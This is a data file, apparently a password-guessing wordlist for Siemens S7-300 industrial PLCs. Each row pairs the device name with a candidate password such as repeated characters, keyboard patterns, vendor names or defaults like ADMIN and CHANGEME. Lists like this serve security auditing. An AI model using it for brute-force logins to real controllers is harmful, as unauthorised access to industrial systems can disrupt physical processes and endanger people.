s7-300,,,,,11111,,,\nsiemens s7-300,,,,,111111,,,\nsiemens s7-300,,,,,1111111,,,\nsiemens s7-300,,,,,11111111,,,\nsiemens s7-300,,,,,11112222,,,\nsiemens s7-300,,,,,112233,,,\nsiemens s7-300,,,,,11223344,,,\nsiemens s7-300,,,,,123,,,\nsiemens s7-300,,,,,123123,,,\nsiemens s7-300,,,,,12314500,,,\nsiemens s7-300,,,,,123321,,,\nsiemens s7-300,,,,,1234,,,\nsiemens s7-300,,,,,12344321,,,\nsiemens s7-300,,,,,12345,,,\nsiemens s7-300,,,,,123456,,,\nsiemens s7-300,,,,,1234567,,,\nsiemens s7-300,,,,,12345678,,,\nsiemens s7-300,,,,,12348765,,,\nsiemens s7-300,,,,,123654,,,\nsiemens s7-300,,,,,123ASD,,,\nsiemens s7-300,,,,,123QWE,,,\nsiemens s7-300,,,,,123asd,,,\nsiemens s7-300,,,,,123qwe,,,\nsiemens s7-300,,,,,1246,,,\nsiemens s7-300,,,,,128BIT,,,\nsiemens s7-300,,,,,128bit,,,\nsiemens s7-300,,,,,1313,,,\nsiemens s7-300,,,,,1502,,,\nsiemens s7-300,,,,,151298,,,\nsiemens s7-300,,,,,166816,,,\nsiemens s7-300,,,,,180497,,,\nsiemens s7-300,,,,,1890AGB,,,\nsiemens s7-300,,,,,1890agb,,,\nsiemens s7-300,,,,,1954,,,\nsiemens s7-300,,,,,1G2W3E,,,\nsiemens s7-300,,,,,1q2w3e,,,\nsiemens s7-300,,,,,2,,,\nsiemens s7-300,,,,,21,,,\nsiemens s7-300,,,,,21241036,,,\nsiemens s7-300,,,,,2128506,,,\nsiemens s7-300,,,,,22,,,\nsiemens s7-300,,,,,222,,,\nsiemens s7-300,,,,,2222,,,\nsiemens s7-300,,,,,22222,,,\nsiemens s7-300,,,,,222222,,,\nsiemens s7-300,,,,,2222222,,,\nsiemens s7-300,,,,,22222222,,,\nsiemens s7-300,,,,,266344,,,\nsiemens s7-300,,,,,281067,,,\nsiemens s7-300,,,,,281068,,,\nsiemens s7-300,,,,,2BW9,,,\nsiemens s7-300,,,,,2WSXcder,,,\nsiemens s7-300,,,,,3,,,\nsiemens s7-300,,,,,31994,,,\nsiemens s7-300,,,,,321,,,\nsiemens s7-300,,,,,33,,,\nsiemens s7-300,,,,,333,,,\nsiemens s7-300,,,,,3333,,,\nsiemens s7-300,,,,,33333,,,\nsiemens s7-300,,,,,333333,,,\nsiemens s7-300,,,,,3333333,,,\nsiemens s7-300,,,,,33333333,,,\nsiemens s7-300,,,,,3477,,,\nsiemens s7-300,,,,,355025,,,\nsiemens s7-300,,,,,3597,,,\nsiemens s7-300,,,,,3ASCOTEL,,,\nsiemens s7-300,,,,,3ORRO,,,\nsiemens s7-300,,,,,3WARE,,,\nsiemens s7-300,,,,,3ascotel,,,\nsiemens s7-300,,,,,3ep5w2u,,,\nsiemens s7-300,,,,,3orro,,,\nsiemens s7-300,,,,,3ware,,,\nsiemens s7-300,,,,,4,,,\nsiemens s7-300,,,,,42296795,,,\nsiemens s7-300,,,,,4321,,,\nsiemens s7-300,,,,,44,,,\nsiemens s7-300,,,,,444,,,\nsiemens s7-300,,,,,4444,,,\nsiemens s7-300,,,,,44444,,,\nsiemens s7-300,,,,,444444,,,\nsiemens s7-300,,,,,4444444,,,\nsiemens s7-300,,,,,44444444,,,\nsiemens s7-300,,,,,4ERT,,,\nsiemens s7-300,,,,,4G5K,,,\nsiemens s7-300,,,,,4G7S,,,\nsiemens s7-300,,,,,4TAS,,,\nsiemens s7-300,,,,,4ert,,,\nsiemens s7-300,,,,,4getme2,,,\nsiemens s7-300,,,,,4tas,,,\nsiemens s7-300,,,,,5,,,\nsiemens s7-300,,,,,5001,,,\nsiemens s7-300,,,,,5150,,,\nsiemens s7-300,,,,,5201314,,,\nsiemens s7-300,,,,,54321,,,\nsiemens s7-300,,,,,55,,,\nsiemens s7-300,,,,,55055,,,\nsiemens s7-300,,,,,555,,,\nsiemens s7-300,,,,,5555,,,\nsiemens s7-300,,,,,55555,,,\nsiemens s7-300,,,,,555555,,,\nsiemens s7-300,,,,,5555555,,,\nsiemens s7-300,,,,,55555555,,,\nsiemens s7-300,,,,,56789,,,\nsiemens s7-300,,,,,5693,,,\nsiemens s7-300,,,,,5777364,,,\nsiemens s7-300,,,,,5860,,,\nsiemens s7-300,,,,,589589,,,\nsiemens s7-300,,,,,6,,,\nsiemens s7-300,,,,,60587,,,\nsiemens s7-300,,,,,654321,,,\nsiemens s7-300,,,,,66,,,\nsiemens s7-300,,,,,666,,,\nsiemens s7-300,,,,,6666,,,\nsiemens s7-300,,,,,66666,,,\nsiemens s7-300,,,,,666666,,,\nsiemens s7-300,,,,,6666666,,,\nsiemens s7-300,,,,,66666666,,,\nsiemens s7-300,,,,,66808920,,,\nsiemens s7-300,,,,,6969,,,\nsiemens s7-300,,,,,7,,,\nsiemens s7-300,,,,,7654321,,,\nsiemens s7-300,,,,,77,,,\nsiemens s7-300,,,,,777,,,\nsiemens s7-300,,,,,7777,,,\nsiemens s7-300,,,,,77777,,,\nsiemens s7-300,,,,,777777,,,\nsiemens s7-300,,,,,7777777,,,\nsiemens s7-300,,,,,77777777,,,\nsiemens s7-300,,,,,7SH4,,,\nsiemens s7-300,,,,,8,,,\nsiemens s7-300,,,,,8111,,,\nsiemens s7-300,,,,,8429,,,\nsiemens s7-300,,,,,851141,,,\nsiemens s7-300,,,,,86844,,,\nsiemens s7-300,,,,,8746550,,,\nsiemens s7-300,,,,,87654321,,,\nsiemens s7-300,,,,,88,,,\nsiemens s7-300,,,,,888,,,\nsiemens s7-300,,,,,8888,,,\nsiemens s7-300,,,,,88888,,,\nsiemens s7-300,,,,,888888,,,\nsiemens s7-300,,,,,8888888,,,\nsiemens s7-300,,,,,88888888,,,\nsiemens s7-300,,,,,88981684,,,\nsiemens s7-300,,,,,9,,,\nsiemens s7-300,,,,,901100,,,\nsiemens s7-300,,,,,99,,,\nsiemens s7-300,,,,,999,,,\nsiemens s7-300,,,,,9999,,,\nsiemens s7-300,,,,,99999,,,\nsiemens s7-300,,,,,999999,,,\nsiemens s7-300,,,,,9999999,,,\nsiemens s7-300,,,,,99999999,,,\nsiemens s7-300,,,,,9W5K,,,\nsiemens s7-300,,,,,;,,,\nsiemens s7-300,,,,,;;,,,\nsiemens s7-300,,,,,;;;,,,\nsiemens s7-300,,,,,;;;;,,,\nsiemens s7-300,,,,,;;;;;,,,\nsiemens s7-300,,,,,;;;;;;,,,\nsiemens s7-300,,,,,;;;;;;;,,,\nsiemens s7-300,,,,,;;;;;;;;,,,\nsiemens s7-300,,,,,=,,,\nsiemens s7-300,,,,,==,,,\nsiemens s7-300,,,,,===,,,\nsiemens s7-300,,,,,====,,,\nsiemens s7-300,,,,,=====,,,\nsiemens s7-300,,,,,======,,,\nsiemens s7-300,,,,,=======,,,\nsiemens s7-300,,,,,========,,,\nsiemens s7-300,,,,,@#$123,,,\nsiemens s7-300,,,,,A,,,\nsiemens s7-300,,,,,A-POWER,,,\nsiemens s7-300,,,,,A/D,,,\nsiemens s7-300,,,,,AA,,,\nsiemens s7-300,,,,,AAA,,,\nsiemens s7-300,,,,,AAAA,,,\nsiemens s7-300,,,,,AAAAA,,,\nsiemens s7-300,,,,,AAAAAA,,,\nsiemens s7-300,,,,,AAAAAAA,,,\nsiemens s7-300,,,,,AAAAAAAA,,,\nsiemens s7-300,,,,,AABBCC,,,\nsiemens s7-300,,,,,AAEON,,,\nsiemens s7-300,,,,,AAVID,,,\nsiemens s7-300,,,,,AB,,,\nsiemens s7-300,,,,,ABB,,,\nsiemens s7-300,,,,,ABC,,,\nsiemens s7-300,,,,,ABC123,,,\nsiemens s7-300,,,,,ABCD,,,\nsiemens s7-300,,,,,ABCDE,,,\nsiemens s7-300,,,,,ABCDEF,,,\nsiemens s7-300,,,,,ABCDEFG,,,\nsiemens s7-300,,,,,ABCDEFGH,,,\nsiemens s7-300,,,,,ABELCONN,,,\nsiemens s7-300,,,,,ABOV,,,\nsiemens s7-300,,,,,ABRACON,,,\nsiemens s7-300,,,,,ABSOPULS,,,\nsiemens s7-300,,,,,ABTECH,,,\nsiemens s7-300,,,,,ABUNLOCK,,,\nsiemens s7-300,,,,,ACAM,,,\nsiemens s7-300,,,,,ACC,,,\nsiemens s7-300,,,,,ACCESS,,,\nsiemens s7-300,,,,,ACCORD,,,\nsiemens s7-300,,,,,ACON,,,\nsiemens s7-300,,,,,ACOPIAN,,,\nsiemens s7-300,,,,,ACP,,,\nsiemens s7-300,,,,,ACTEL,,,\nsiemens s7-300,,,,,ACTIVEX,,,\nsiemens s7-300,,,,,ADACTUS,,,\nsiemens s7-300,,,,,ADAM,,,\nsiemens s7-300,,,,,ADC,,,\nsiemens s7-300,,,,,ADDA,,,\nsiemens s7-300,,,,,ADELS,,,\nsiemens s7-300,,,,,ADFEXC,,,\nsiemens s7-300,,,,,ADI,,,\nsiemens s7-300,,,,,ADMIN,,,\nsiemens s7-300,,,,,ADMIN123,,,\nsiemens s7-300,,,,,ADMINTTD,,,\nsiemens s7-300,,,,,ADSLROOT,,,\nsiemens s7-300,,,,,ADTRAN,,,\nsiemens s7-300,,,,,ADVANCED,,,\nsiemens s7-300,,,,,ADVANTEC,,,\nsiemens s7-300,,,,,AEG MIS,,,\nsiemens s7-300,,,,,AEG,,,\nsiemens s7-300,,,,,AEM,,,\nsiemens s7-300,,,,,AEROFLEX,,,\nsiemens s7-300,,,,,AFT,,,\nsiemens s7-300,,,,,AITECH,,,\nsiemens s7-300,,,,,AKIWA,,,\nsiemens s7-300,,,,,ALBRIGHT,,,\nsiemens s7-300,,,,,ALCOR,,,\nsiemens s7-300,,,,,ALEPH,,,\nsiemens s7-300,,,,,ALFA'R,,,\nsiemens s7-300,,,,,ALFA,,,\nsiemens s7-300,,,,,ALFAMAG,,,\nsiemens s7-300,,,,,ALFATRON,,,\nsiemens s7-300,,,,,ALI,,,\nsiemens s7-300,,,,,ALL,,,\nsiemens s7-300,,,,,ALLEGRO,,,\nsiemens s7-300,,,,,ALLEN,,,\nsiemens s7-300,,,,,ALLIANCE,,,\nsiemens s7-300,,,,,ALLIED,,,\nsiemens s7-300,,,,,ALPINE,,,\nsiemens s7-300,,,,,ALPS,,,\nsiemens s7-300,,,,,ALTERA,,,\nsiemens s7-300,,,,,AMBER,,,\nsiemens s7-300,,,,,AMD,,,\nsiemens s7-300,,,,,AMERICAN,,,\nsiemens s7-300,,,,,AMETHERM,,,\nsiemens s7-300,,,,,AMI,,,\nsiemens s7-300,,,,,AMIC,,,\nsiemens s7-300,,,,,AMIS,,,\nsiemens s7-300,,,,,AMMC,,,\nsiemens s7-300,,,,,AMP,,,\nsiemens s7-300,,,,,AMPERITE,,,\nsiemens s7-300,,,,,AMPHENOL,,,\nsiemens s7-300,,,,,AMPIRE,,,\nsiemens s7-300,,,,,AMT,,,\nsiemens s7-300,,,,,ANACHIP,,,\nsiemens s7-300,,,,,ANADIGIC,,,\nsiemens s7-300,,,,,ANADIGM,,,\nsiemens s7-300,,,,,ANALOG,,,\nsiemens s7-300,,,,,ANALOGIC,,,\nsiemens s7-300,,,,,ANAREN,,,\nsiemens s7-300,,,,,ANGEL,,,\nsiemens s7-300,,,,,ANGLE,,,\nsiemens s7-300,,,,,ANICUST,,,\nsiemens s7-300,,,,,ANLA,,,\nsiemens s7-300,,,,,ANLEIM,,,\nsiemens s7-300,,,,,ANRITSU,,,\nsiemens s7-300,,,,,ANS#150,,,\nsiemens s7-300,,,,,ANSHAN,,,\nsiemens s7-300,,,,,ANSMANN,,,\nsiemens s7-300,,,,,ANYCOM,,,\nsiemens s7-300,,,,,ANYDATA,,,\nsiemens s7-300,,,,,ANYONE,,,\nsiemens s7-300,,,,,ANYWAY,,,\nsiemens s7-300,,,,,APBODIUR,,,\nsiemens s7-300,,,,,APC,,,\nsiemens s7-300,,,,,APEM,,,\nsiemens s7-300,,,,,APEX,,,\nsiemens s7-300,,,,,API,,,\nsiemens s7-300,,,,,APLUS,,,\nsiemens s7-300,,,,,APM,,,\nsiemens s7-300,,,,,APP,,,\nsiemens s7-300,,,,,APPLIED,,,\nsiemens s7-300,,,,,APRA,,,\nsiemens s7-300,,,,,ARSENAL,,,\nsiemens s7-300,,,,,ARTICON,,,\nsiemens s7-300,,,,,ASANTE,,,\nsiemens s7-300,,,,,ASCEND,,,\nsiemens s7-300,,,,,ASD,,,\nsiemens s7-300,,,,,ASDF,,,\nsiemens s7-300,,,,,ASDFG,,,\nsiemens s7-300,,,,,ASDFGH,,,\nsiemens s7-300,,,,,ASDFGHJ,,,\nsiemens s7-300,,,,,ASDFGHJK,,,\nsiemens s7-300,,,,,ASI,,,\nsiemens s7-300,,,,,ASUTP,,,\nsiemens s7-300,,,,,AT4400,,,\nsiemens s7-300,,,,,ATC,,,\nsiemens s7-300,,,,,ATC123,,,\nsiemens s7-300,,,,,ATLANTIS,,,\nsiemens s7-300,,,,,ATTACK,,,\nsiemens s7-300,,,,,AUTOHORS,,,\nsiemens s7-300,,,,,AZSXDC,,,\nsiemens s7-300,,,,,Aeroflex,,,\nsiemens s7-300,,,,,Anleim,,,\nsiemens s7-300,,,,,Asante,,,\nsiemens s7-300,,,,,Ascend,,,\nsiemens s7-300,,,,,B&R,,,\nsiemens s7-300,,,,,B,,,\nsiemens s7-300,,,,,B2H4,,,\nsiemens s7-300,,,,,B9W3,,,\nsiemens s7-300,,,,,BACK,,,\nsiemens s7-300,,,,,BACKDOOR,,,\nsiemens s7-300,,,,,BADBOY,,,\nsiemens s7-300,,,,,BARRICADE,,,\nsiemens s7-300,,,,,BASEBALL,,,\nsiemens s7-300,,,,,BB,,,\nsiemens s7-300,,,,,BBB,,,\nsiemens s7-300,,,,,BBBB,,,\nsiemens s7-300,,,,,BBBBB,,,\nsiemens s7-300,,,,,BBBBBB,,,\nsiemens s7-300,,,,,BBBBBBB,,,\nsiemens s7-300,,,,,BBBBBBBB,,,\nsiemens s7-300,,,,,BCIIMPW,,,\nsiemens s7-300,,,,,BCIMPW,,,\nsiemens s7-300,,,,,BCNASPW,,,\nsiemens s7-300,,,,,BEATCH,,,\nsiemens s7-300,,,,,BEERBEER,,,\nsiemens s7-300,,,,,BETERA,,,\nsiemens s7-300,,,,,BIBLE,,,\nsiemens s7-300,,,,,BINTEC,,,\nsiemens s7-300,,,,,BIRDIE,,,\nsiemens s7-300,,,,,BLACK,,,\nsiemens s7-300,,,,,BLASTER,,,\nsiemens s7-300,,,,,BLENDER,,,\nsiemens s7-300,,,,,BLINK,,,\nsiemens s7-300,,,,,BLINK182,,,\nsiemens s7-300,,,,,BLUEPW,,,\nsiemens s7-300,,,,,BOWLING,,,\nsiemens s7-300,,,,,BRADLEY,,,\nsiemens s7-300,,,,,BRIDGE,,,\nsiemens s7-300,,,,,BRIGHT,,,\nsiemens s7-300,,,,,C,,,\nsiemens s7-300,,,,,CA01,,,\nsiemens s7-300,,,,,CACADMIN,,,\nsiemens s7-300,,,,,CACTUS,,,\nsiemens s7-300,,,,,CALVIN,,,\nsiemens s7-300,,,,,CAN,,,\nsiemens s7-300,,,,,CANBUS,,,\nsiemens s7-300,,,,,CAROLIAN,,,\nsiemens s7-300,,,,,CASCADE,,,\nsiemens s7-300,,,,,CC,,,\nsiemens s7-300,,,,,CCC,,,\nsiemens s7-300,,,,,CCCC,,,\nsiemens s7-300,,,,,CCCCC,,,\nsiemens s7-300,,,,,CCCCCC,,,\nsiemens s7-300,,,,,CCCCCCC,,,\nsiemens s7-300,,,,,CCCCCCCC,,,\nsiemens s7-300,,,,,CCRUSR,,,\nsiemens s7-300,,,,,CELLIT,,,\nsiemens s7-300,,,,,CFC,,,\nsiemens s7-300,,,,,CHABGEME,,,\nsiemens s7-300,,,,,CHANGEME,,,\nsiemens s7-300,,,,,CHANGIT,,,\nsiemens s7-300,,,,,CHARLIE,,,\nsiemens s7-300,,,,,CISCO,,,\nsiemens s7-300,,,,,CITEL,,,\nsiemens s7-300,,,,,CLIENT,,,\nsiemens s7-300,,,,,CMAKER,,,\nsiemens s7-300,,,,,CMS500,,,\nsiemens s7-300,,,,,CNAS,,,\nsiemens s7-300,,,,,CODY,,,\nsiemens s7-300,,,,,COGNOS,,,\nsiemens s7-300,,,,,COMPUTER,,,\nsiemens s7-300,,,,,CONNECT,,,\nsiemens s7-300,,,,,CONV,,,\nsiemens s7-300,,,,,COOL,,,\nsiemens s7-300,,,,,CORECESS,,,\nsiemens s7-300,,,,,COSMOS,,,\nsiemens s7-300,,,,,CRAFT,,,\nsiemens s7-300,,,,,CRAFTPW,,,\nsiemens s7-300,,,,,CRFTPW,,,\nsiemens s7-300,,,,,CRYSTAL,,,\nsiemens s7-300,,,,,CUSTOMER,,,\nsiemens s7-300,,,,,CUSTPW,,,\nsiemens s7-300,,,,,Cisco,,,\nsiemens s7-300,,,,,Col2ogro2,,,\nsiemens s7-300,,,,,D,,,\nsiemens s7-300,,,,,D-Link,,,\nsiemens s7-300,,,,,D00M,,,\nsiemens s7-300,,,,,DADMIN01,,,\nsiemens s7-300,,,,,DANGER,,,\nsiemens s7-300,,,,,DATABASE,,,\nsiemens s7-300,,,,,DBPS,,,\nsiemens s7-300,,,,,DD,,,\nsiemens s7-300,,,,,DDD,,,\nsiemens s7-300,,,,,DDDD,,,\nsiemens s7-300,,,,,DDDDD,,,\nsiemens s7-300,,,,,DDDDDD,,,\nsiemens s7-300,,,,,DDDDDDD,,,\nsiemens s7-300,,,,,DDDDDDDD,,,\nsiemens s7-300,,,,,DEAN,,,\nsiemens s7-300,,,,,DEFAULT,,,\nsiemens s7-300,,,,,DEMO,,,\nsiemens s7-300,,,,,DENISE,,,\nsiemens s7-300,,,,,DERPAROL,,,\nsiemens s7-300,,,,,DEVEVAN,,,\nsiemens s7-300,,,,,DEVICE,,,\nsiemens s7-300,,,,,DEVICES,,,\nsiemens s7-300,,,,,DHS3MT,,,\nsiemens s7-300,,,,,DHS3PMS,,,\nsiemens s7-300,,,,,DIABL0,,,\nsiemens s7-300,,,,,DIABLO,,,\nsiemens s7-300,,,,,DIAMOND,,,\nsiemens s7-300,,,,,DIGITAL,,,\nsiemens s7-300,,,,,DL20,,,\nsiemens s7-300,,,,,DLINK,,,\nsiemens s7-300,,,,,DOLLAR,,,\nsiemens s7-300,,,,,DOOM,,,\nsiemens s7-300,,,,,DRAADLOOS,,,\nsiemens s7-300,,,,,DRIVEES,,,\nsiemens s7-300,,,,,E,,,\nsiemens s7-300,,,,,ECHO,,,\nsiemens s7-300,,,,,EE,,,\nsiemens s7-300,,,,,EEE,,,\nsiemens s7-300,,,,,EEEE,,,\nsiemens s7-300,,,,,EEEEE,,,\nsiemens s7-300,,,,,EEEEEE,,,\nsiemens s7-300,,,,,EEEEEEE,,,\nsiemens s7-300,,,,,EEEEEEEE,,,\nsiemens s7-300,,,,,EGDFV,,,\nsiemens s7-300,,,,,ELECTRIN,,,\nsiemens s7-300,,,,,ELVIS,,,\nsiemens s7-300,,,,,ENABLE,,,\nsiemens s7-300,,,,,ENERGY,,,\nsiemens s7-300,,,,,ENGINEER,,,\nsiemens s7-300,,,,,ERR0R,,,\nsiemens s7-300,,,,,EVENING,,,\nsiemens s7-300,,,,,EXABYTE,,,\nsiemens s7-300,,,,,EXPERT03,,,\nsiemens s7-300,,,,,Exabyte,,,\nsiemens s7-300,,,,,F,,,\nsiemens s7-300,,,,,FATHER,,,\nsiemens s7-300,,,,,FBD,,,\nsiemens s7-300,,,,,FF,,,\nsiemens s7-300,,,,,FFF,,,\nsiemens s7-300,,,,,FFFF,,,\nsiemens s7-300,,,,,FFFFF,,,\nsiemens s7-300,,,,,FFFFFF,,,\nsiemens s7-300,,,,,FFFFFFF,,,\nsiemens s7-300,,,,,FFFFFFFF,,,\nsiemens s7-300,,,,,FIELD,,,\nsiemens s7-300,,,,,FIRE,,,\nsiemens s7-300,,,,,FIREPORT,,,\nsiemens s7-300,,,,,FISH,,,\nsiemens s7-300,,,,,FIVRANNE,,,\nsiemens s7-300,,,,,FLASH,,,\nsiemens s7-300,,,,,FLEX,,,\nsiemens s7-300,,,,,FLEXIBLE,,,\nsiemens s7-300,,,,,FOOTBALL,,,\nsiemens s7-300,,,,,FRIEND,,,\nsiemens s7-300,,,,,FUCK,,,\nsiemens s7-300,,,,,FUCKOFF,,,\nsiemens s7-300,,,,,FUCKYOU,,,\nsiemens s7-300,,,,,Fireport,,,\nsiemens s7-300,,,,,G,,,\nsiemens s7-300,,,,,G00GLE,,,\nsiemens s7-300,,,,,G0F9,,,\nsiemens s7-300,,,,,G0K1,,,\nsiemens s7-300,,,,,G6K6,,,\nsiemens s7-300,,,,,GAMA,,,\nsiemens s7-300,,,,,GAWSED,,,\nsiemens s7-300,,,,,GEARDOG,,,\nsiemens s7-300,,,,,GFCC,,,\nsiemens s7-300,,,,,GFCCDJHL,,,\nsiemens s7-300,,,,,GFHJKM,,,\nsiemens s7-300,,,,,GG,,,\nsiemens s7-300,,,,,GGG,,,\nsiemens s7-300,,,,,GGGG,,,\nsiemens s7-300,,,,,GGGGG,,,\nsiemens s7-300,,,,,GGGGGG,,,\nsiemens s7-300,,,,,GGGGGGG,,,\nsiemens s7-300,,,,,GGGGGGGG,,,\nsiemens s7-300,,,,,GHBDTN,,,\nsiemens s7-300,,,,,GHOST,,,\nsiemens s7-300,,,,,GOAL,,,\nsiemens s7-300,,,,,GOLF,,,\nsiemens s7-300,,,,,GOOGLE,,,\nsiemens s7-300,,,,,GOT,,,\nsiemens s7-300,,,,,GUEST,,,\nsiemens s7-300,,,,,Geardog,,,\nsiemens s7-300,,,,,H,,,\nsiemens s7-300,,,,,HARDWARE,,,\nsiemens s7-300,,,,,HELEN,,,\nsiemens s7-300,,,,,HELLO,,,\nsiemens s7-300,,,,,HELP,,,\nsiemens s7-300,,,,,HELP1954,,,\nsiemens s7-300,,,,,HELPDESK,,,\nsiemens s7-300,,,,,HEXSEAL,,,\nsiemens s7-300,,,,,HH,,,\nsiemens s7-300,,,,,HHH,,,\nsiemens s7-300,,,,,HHHH,,,\nsiemens s7-300,,,,,HHHHH,,,\nsiemens s7-300,,,,,HHHHHH,,,\nsiemens s7-300,,,,,HHHHHHH,,,\nsiemens s7-300,,,,,HHHHHHHH,,,\nsiemens s7-300,,,,,HIGHSPEED,,,\nsiemens s7-300,,,,,HINEAR,,,\nsiemens s7-300,,,,,HOME,,,\nsiemens s7-300,,,,,HOMEPLUG,,,\nsiemens s7-300,,,,,HONDA,,,\nsiemens s7-300,,,,,HP,,,\nsiemens s7-300,,,,,HPOFFICE,,,\nsiemens s7-300,,,,,HPONLY,,,\nsiemens s7-300,,,,,HPP187,,,\nsiemens s7-300,,,,,HPP189,,,\nsiemens s7-300,,,,,HPP196,,,\nsiemens s7-300,,,,,HRLOO,,,\nsiemens s7-300,,,,,HTTP,,,\nsiemens s7-300,,,,,Helpdesk,,,\nsiemens s7-300,,,,,HomePlug,,,\nsiemens s7-300,,,,,I,,,\nsiemens s7-300,,,,,IDIRECT,,,\nsiemens s7-300,,,,,II,,,\nsiemens s7-300,,,,,III,,,\nsiemens s7-300,,,,,IIII,,,\nsiemens s7-300,,,,,IIIII,,,\nsiemens s7-300,,,,,IIIIII,,,\nsiemens s7-300,,,,,IIIIIII,,,\nsiemens s7-300,,,,,IIIIIIII,,,\nsiemens s7-300,,,,,ILMI,,,\nsiemens s7-300,,,,,ILOVEYOU,,,\nsiemens s7-300,,,,,IMAGES,,,\nsiemens s7-300,,,,,INADS,,,\nsiemens s7-300,,,,,INC,,,\nsiemens s7-300,,,,,INDSPW,,,\nsiemens s7-300,,,,,INFERNO,,,\nsiemens s7-300,,,,,INITPW,,,\nsiemens s7-300,,,,,INMET,,,\nsiemens s7-300,,,,,INTEL,,,\nsiemens s7-300,,,,,INTERNET,,,\nsiemens s7-300,,,,,INTX3,,,\nsiemens s7-300,,,,,IRONPORT,,,\nsiemens s7-300,,,,,ISEE,,,\nsiemens s7-300,,,,,ISP,,,\nsiemens s7-300,,,,,ITF3000,,,\nsiemens s7-300,,,,,Inmet,,,\nsiemens s7-300,,,,,Intel,,,\nsiemens s7-300,,,,,Internet,,,\nsiemens s7-300,,,,,J,,,\nsiemens s7-300,,,,,J6R6,,,\nsiemens s7-300,,,,,J6W8,,,\nsiemens s7-300,,,,,JACK,,,\nsiemens s7-300,,,,,JANET,,,\nsiemens s7-300,,,,,JANNIE,,,\nsiemens s7-300,,,,,JASMINE,,,\nsiemens s7-300,,,,,JDE,,,\nsiemens s7-300,,,,,JJ,,,\nsiemens s7-300,,,,,JJJ,,,\nsiemens s7-300,,,,,JJJJ,,,\nsiemens s7-300,,,,,JJJJJ,,,\nsiemens s7-300,,,,,JJJJJJ,,,\nsiemens s7-300,,,,,JJJJJJJ,,,\nsiemens s7-300,,,,,JJJJJJJJ,,,\nsiemens s7-300,,,,,JOCKER,,,\nsiemens s7-300,,,,,JOHN,,,\nsiemens s7-300,,,,,JORDAN,,,\nsiemens s7-300,,,,,JORDAN23,,,\nsiemens s7-300,,,,,JR58,,,\nsiemens s7-300,,,,,JR59,,,\nsiemens s7-300,,,,,K,,,\nsiemens s7-300,,,,,KERMIT,,,\nsiemens s7-300,,,,,KILLER,,,\nsiemens s7-300,,,,,KILO1987,,,\nsiemens s7-300,,,,,KK,,,\nsiemens s7-300,,,,,KKK,,,\nsiemens s7-300,,,,,KKKK,,,\nsiemens s7-300,,,,,KKKKK,,,\nsiemens s7-300,,,,,KKKKKK,,,\nsiemens s7-300,,,,,KKKKKKK,,,\nsiemens s7-300,,,,,KKKKKKKK,,,\nsiemens s7-300,,,,,KORN,,,\nsiemens s7-300,,,,,L,,,\nsiemens s7-300,,,,,LAD,,,\nsiemens s7-300,,,,,LAFLAF,,,\nsiemens s7-300,,,,,LETACLA,,,\nsiemens s7-300,,,,,LETMEIN,,,\nsiemens s7-300,,,,,LEVEL1,,,\nsiemens s7-300,,,,,LEVITON,,,\nsiemens s7-300,,,,,LILLME,,,\nsiemens s7-300,,,,,LINGA,,,\nsiemens s7-300,,,,,LINUX,,,\nsiemens s7-300,,,,,LISA,,,\nsiemens s7-300,,,,,LL,,,\nsiemens s7-300,,,,,LLATSNI,,,\nsiemens s7-300,,,,,LLL,,,\nsiemens s7-300,,,,,LLLL,,,\nsiemens s7-300,,,,,LLLLL,,,\nsiemens s7-300,,,,,LLLLLL,,,\nsiemens s7-300,,,,,LLLLLLL,,,\nsiemens s7-300,,,,,LLLLLLLL,,,\nsiemens s7-300,,,,,LOCATEPW,,,\nsiemens s7-300,,,,,LOCK,,,\nsiemens s7-300,,,,,LOGIN,,,\nsiemens s7-300,,,,,LOOKER,,,\nsiemens s7-300,,,,,LOTUS,,,\nsiemens s7-300,,,,,LOVE,,,\nsiemens s7-300,,,,,LTD,,,\nsiemens s7-300,,,,,LUCKY,,,\nsiemens s7-300,,,,,M,,,\nsiemens s7-300,,,,,M1122,,,\nsiemens s7-300,,,,,MAIL,,,\nsiemens s7-300,,,,,MAINT,,,\nsiemens s7-300,,,,,MAINTPW,,,\nsiemens s7-300,,,,,MANAGER,,,\nsiemens s7-300,,,,,MANIAC,,,\nsiemens s7-300,,,,,MASTER,,,\nsiemens s7-300,,,,,MASTERKEY,,,\nsiemens s7-300,,,,,MEDIATOR,,,\nsiemens s7-300,,,,,MEDION,,,\nsiemens s7-300,,,,,MGR,,,\nsiemens s7-300,,,,,MICRO,,,\nsiemens s7-300,,,,,MICROWAV,,,\nsiemens s7-300,,,,,MILLLER,,,\nsiemens s7-300,,,,,MIS,,,\nsiemens s7-300,,,,,MJSSSJJ,,,\nsiemens s7-300,,,,,MJSSSJJ_,,,\nsiemens s7-300,,,,,MLUSR,,,\nsiemens s7-300,,,,,MM,,,\nsiemens s7-300,,,,,MMM,,,\nsiemens s7-300,,,,,MMMM,,,\nsiemens s7-300,,,,,MMMMM,,,\nsiemens s7-300,,,,,MMMMMM,,,\nsiemens s7-300,,,,,MMMMMMM,,,\nsiemens s7-300,,,,,MMMMMMMM,,,\nsiemens s7-300,,,,,MODUL,,,\nsiemens s7-300,,,,,MODULE,,,\nsiemens s7-300,,,,,MONEY,,,\nsiemens s7-300,,,,,MONITOR,,,\nsiemens s7-300,,,,,MONKEY,,,\nsiemens s7-300,,,,,MOSMATIC,,,\nsiemens s7-300,,,,,MOTHER,,,\nsiemens s7-300,,,,,MOTOROLA,,,\nsiemens s7-300,,,,,MOUSE,,,\nsiemens s7-300,,,,,MPE,,,\nsiemens s7-300,,,,,MServer,,,\nsiemens s7-300,,,,,MTCH,,,\nsiemens s7-300,,,,,MUSTANG,,,\nsiemens s7-300,,,,,MYPASS,,,\nsiemens s7-300,,,,,MYPASS123,,,\nsiemens s7-300,,,,,MYPC,,,\nsiemens s7-300,,,,,MYPC123,,,\nsiemens s7-300,,,,,MYSPACE,,,\nsiemens s7-300,,,,,MYSPACE1,,,\nsiemens s7-300,,,,,Manager,,,\nsiemens s7-300,,,,,Master,,,\nsiemens s7-300,,,,,Mau'dib,,,\nsiemens s7-300,,,,,MiniAP,,,\nsiemens s7-300,,,,,Multi,,,\nsiemens s7-300,,,,,N,,,\nsiemens s7-300,,,,,N/A,,,\nsiemens s7-300,,,,,NAADMIN,,,\nsiemens s7-300,,,,,NARANJA,,,\nsiemens s7-300,,,,,NAU,,,\nsiemens s7-300,,,,,NET,,,\nsiemens s7-300,,,,,NETADMIN,,,\nsiemens s7-300,,,,,NETBASE,,,\nsiemens s7-300,,,,,NETCACHE,,,\nsiemens s7-300,,,,,NETMAN,,,\nsiemens s7-300,,,,,NETOPIA,,,\nsiemens s7-300,,,,,NETSCREEN,,,\nsiemens 